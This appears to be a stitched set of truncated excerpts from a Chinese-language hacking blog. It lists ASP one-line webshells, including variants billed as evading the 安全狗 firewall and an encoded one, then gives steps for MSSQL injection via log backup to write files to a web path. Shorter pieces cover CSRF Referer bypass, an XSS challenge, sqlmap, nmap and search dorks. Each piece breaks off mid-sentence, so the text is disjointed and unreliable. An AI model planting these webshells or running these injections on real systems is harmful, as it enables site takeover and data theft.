ASP 普通一句话 <%eval request("8888")%> 突破安全狗的一句话 <%Y=request("x")%> <%eval(Y)%> 数据库加密一句话(密码a) ┼攠數畣整爠煥敵瑳∨≡┩愾 ┼癥污爠煥敵瑳∨≡┩愾 网站配置、版权信息专用一句话 "%><%Eval Request(x)%> 一句话再过护
CSRF遇到Referer绕过的情况,有条件限制,不一定所有的Refere验证就可以绕过1、Refere为空条件下 解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些
现在的网站XSS攻击基本上很少了,但是还是有不注意的时候或偷懒造成XSS跨站脚本攻击.废话不多说,点我挑战 只要构造出payload 并且alert() 即可进入下一关, 看看你的极限在哪里。 思路和技巧很重要!
注意:需要在编译之前修改版本号:1.10.2 下载Linux nginx 1.10.2稳定版 点击此处下载 怎么查看一个网站是什么服务器? 可以在本博客直接按F12在NETWORK里面点击第一个找到Response Headers Accept-Ranges:bytes Cache-Control:public, max-ag
比差异备份多了一步 类型:数字型 数据库:dachui WEB路径:D:\www\html\ 第一步 ;alter database dachui set RECOVERY FULL-- 第二步 ;create table cmd (a image)-- 第三步 ;backup log dachui to disk = '
当前数据库:wangdachui权限:DB_OWNER WEB路径:C:\www\html\ 其实就是一种注入的方式去备份 第一步 将数据库名转成16进制变成:0x77616E67646163687569 ;declare @a sysname,@s varchar(3000) select @a=db_name(),@s=0
安装sqlmapsqlmap是用python写的,所以先安装python,这里不介绍python安装方法自行百度。 sqlmap下载地址 下载之后解压就好了。 普通注入, -u 是URL地址,他会自动找到第一个参数 id sqlmap.py -u "http://www.domain.com/news_info.asp?id=
nmap是专门用于测试扫描端口用的。首先安装nmap 安装nmap很简单,下面是官方地址,一直Next就好了 https://nmap.org/download.html#macosx // 安装好之后终端输入 nmap 如果出现大量帮助命令说明安装成功 判断10.1.1.1操作系统 nmap -O 10.1.1.1 //
搜索域名范围,这个语法会搜索所有域名包括子域名 site:xxx.com 用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用. inurl:login site:xx.com inurl:login|register|admin 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字) intex